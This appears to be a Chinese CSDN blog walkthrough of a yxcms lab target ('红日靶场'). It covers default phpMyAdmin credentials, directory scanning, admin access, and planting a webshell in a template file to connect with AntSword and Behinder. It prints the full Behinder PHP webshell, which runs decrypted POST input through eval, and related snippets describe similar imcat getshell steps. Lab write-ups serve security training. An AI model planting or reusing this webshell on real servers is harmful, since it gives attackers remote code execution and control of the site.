2021-09-01

最新推荐文章于 2024-05-30 12:54:24 发布
最新推荐文章于 2024-05-30 12:54:24 发布
阅读量116 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51170293/article/details/120038635
版权

yxcms 红日靶场
在这里插入图片描述
/phpadmin
在这里插入图片描述

root root
在这里插入图片描述
御剑扫
在这里插入图片描述
查看beifen 解压
在这里插入图片描述
发现这个文件 访问
/yxcms
在这里插入图片描述
在这里插入图片描述
根据提示
在这里插入图片描述
在这里插入图片描述
进来了

写马 再用蚁剑连马

找地方传马
前台模板-》管理首页-》index_index.php 不一定非是这个
只要是php后缀 能写东西 而且是在源码里有的文件 不是别人写的 yxcms文件里能找到的 ,用everything可以搜到的

在这里插入图片描述
写一句话木马
everthing搜该文件的路径 为连蚁剑做准备
在这里插入图片描述
据此找到路径
http://192.168.31.25/yxcms\protected\apps\default\view\default\index_index.php
用蚁剑连 该地址 密码123
在这里插入图片描述

或者换冰蝎连马

冰蝎 sever里找php文件 复制下来写马
在这里插入图片描述
冰蝎码

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

http://192.168.31.25/yxcms\protected\apps\default\view\default\testa.php

在这里插入图片描述
思路

在这里插入图片描述
示意图
在这里插入图片描述
在这里插入图片描述
886

白鹿0820
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
imcat 远程代码执行 (CNVD-2020-32339)
qq_32445755的博客
07-05 385
贴心猫(imcat)是一款PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、共享,永久开源免费。 imcat后台存在代码执行漏洞。攻击者可利用漏洞执行任意代码。 后台路径:root/run/adm.phpCMS后台提供在线源代码编辑功能,然后通过imcat-5.4、imcat、core、glib和safscan.php文件过滤危险函数。但是由于过滤功能的过滤规则不完整,可以编写和执行危险代码,形成代码执行漏洞,攻击者可以通过该漏洞获得服务器的权限 后台:目标\/root/run/adm.php
2021-09-01 网安实验-SQL注入-BaseReconstruction
热门推荐
时光隧道
09-01 4万+
我们直接打开浏览器进入10.1.1.82到题目页面,发现和真题2中的页面是一样的,都是一个简单的登录框。我们首先尝试使用成功注入真题2的pyload“’ or 1=1–”来注入,结果发现并没有成功。并且有提示,说是参数中包含了敏感字符,看来是做了过滤。 原来是前端做了参数过滤,通常我们看到这种在前端做验证的限制,都会想到使用抓包改包工具来突破前端限制。这里我们再次祭出神器brupsuit。直接进行抓包改包。任意输入账号,密码,然后开启brupsuit抓包,在数据包中将我们的pyload写上。 Forwa
贴心猫(ImCat) v4.8
09-30
贴心猫(ImCat) 是以PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、、共享。适用于:网店,医院,学校,企业站,个人网站,企业内部Intranet,中小型行业门户站点等……功能
imcat远程代码执行(CNVD-2020-32339)
m0_65150886的博客
01-31 230
贴心猫(imcat)是一款PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、共享,永久开源免费。2.访问http://ip:port/root/run/adm.php ,进入后台登录页面,并输入账号密码进行登录。3.在工具中找到DIY配置-搜索,选择入口配置,修改dev.php内容为php一句话木马。1.访问http://ip:port,出现如下页面,开始实验。4.保存后,通过蚁剑连接,getshell。密码:pass_vulfocus。账号:adm_vulfocus。1.关闭后台修改源码功能。
2021-09-01第一天
weixin_45528849的博客
09-01 4120
在oracle中用sql ,生成一个随机id: select sys_guid() as id from dual;
2021-01-18
weixin_54641072的博客
01-18 1709
找程序猿哥哥!!!!编制App或者小程序
2021-01-06
qq_40504996的博客
01-06 811
运行机某个js文件访问不了。做了过滤器,没有被过滤的。其他js文件都可以。就单独一个403。考虑是否是防火墙做了一些敏感词的判断过滤。 将js文件名修改试一下,或者从防火墙那方面做文章 ...
2021-01-09
m0_37771194的博客
01-09 1万+
VS 2015下载 VS2015 社区版 X86下载: 链接:https://pan.baidu.com/s/1p1DsxfxtA3YV-sWCTjJf9A 提取码:kgtb VS2015 社区版 X64下载: 链接:https://pan.baidu.com/s/1zQOixIOVQfJKQLT66p3Lxg 提取码:adoa 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
2021-01-09T18:00:00.000Z格式时间存数据库,字段类型为datetime,直接出现报错
gkkljy的博客
02-09 6603
1.前端使用的elementui的<el-date-picker ,传入的时间值为2021-01-09T18:00:00.000Z格式 2.需要将格式进行转换,才能存入数据库datetime类型的字段,在后端代码写一个工具类,需要转换时直接调用就可以了 import org.apache.commons.lang3.StringUtils; import java.text.DateFormat; import java.text.ParseException; import java.text.
TMaize#tmaize-blog#2021-09-01-php镜像安装模块1
07-25
在这里记录下步骤,说不定以后还会用到说明原始镜像已经内置了如下的源码,为了减小体积只是压缩起来了,并未编译安装,使用docker-php-ext-install
Pytest51展昭(2021-09-01).docx
09-01
pytest
必易微-2021-09-01-8-2会计师第二轮回复意见.pdf
11-14
必易微-2021-09-01-8-2会计师第二轮回复意见.pdf
300646-侨源气体-2021-09-01-律师事务所补充法律意见书(四).docx
11-21
300646-侨源气体-2021-09-01-律师事务所补充法律意见书(四).docx
云天励飞-2021-09-01-8-2 会计师回复意见(二次落实函).pdf
11-14
云天励飞-2021-09-01-8-2 会计师回复意见(二次落实函).pdf
2021-09-01 网安实验-SQL注入-RotatePicture
时光隧道
09-01 4万+
打开题目链接(在实验机器中使用浏览器访问http://10.1.1.82) 打开链接发现了有一个图片反转的功能,上传一个图片就会得到它的反转之后的结果,url here处需要输入图片的url地址 我们测试一下是不是支持文件协议 file:///etc/passwd 出现了passwd的内容,是支持file协议的,但是出现的只是passwd文件的第一行的部分内容,我们查看下源码看能否找到到完整的内容 源码里也并没有源码的完整的内容 我们在源码当中看到了一个py文件,我们看下是否能找到这个文件 根据
如何使用宝塔面板搭建Tipask问答社区网站并发布公网远程访问
深入解析C/C++编程技巧,带你探索高效开发之路
05-29 800
我们的生活和工作中,碰到问题的时候通常都会到网上寻找答案,但网上寻找到的答案要么答非所问,要么全是广告,真正有价值的回答少之又少,这就让人很头疼。也正是这个痛点,催生了如“某乎”这样的问答平台,让我们能轻松快速的找到想要的答案。本文主要跟大家介绍,如何使用Cpolar+Tipask,在Ubuntu系统上搭建一个私人问答网站并实现随时随地远程访问本地站点,无需公网ip也不用购买域名服务器。Tipask网站从基本上看,实际与论坛网站很相似,因此在安装和部署上并没有太大的难度。
HackTheBox-Machines--Popcorn
七天
05-28 466
Popcorn 测试过程。
建WordPress主题官网模板
最新发布
xiaoyuya
05-30 140
WordPress主题官网模板
id uid exam_id start_time submit_time score 1 1001 9001 2021-09-01 09:01:01 2021-09-01 09:51:01 78 2 1001 9002 2021-09-01 09:01:01 2021-09-01 09:31:00 81 3 1002 9002 2021-09-01 12:01:01 2021-09-01 12:31:01 81 4 1003 9001 2021-09-01 19:01:01 2021-09-01 19:59:01 86 5 1003 9002 2021-09-01 12:01:01 2021-09-01 12:31:51 89 6 1004 9002 2021-09-01 19:01:01 2021-09-01 19:30:01 85 7 1005 9001 2021-09-01 12:01:01 2021-09-01 12:31:02 85 8 1006 9001 2021-09-07 10:01:01 2021-09-07 10:21:01 84 9 1003 9001 2021-09-08 12:01:01 2021-09-08 12:11:01 40 10 1003 9002 2021-09-01 14:01:01 (NULL) (NULL) 11 1005 9001 2021-09-01 14:01:01 (NULL) (NULL) 12 1003 9003 2021-09-08 15:01:01 (NULL) (NULL) sql求时间差
07-25
您可以使用 SQL 中的函数来计算时间差。假设您想要计算 start_time 和 submit_time 之间的时间差,可以使用以下语句: ```sql SELECT id, uid, exam_id, start_time, submit_time, score, EXTRACT(EPOCH FROM ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值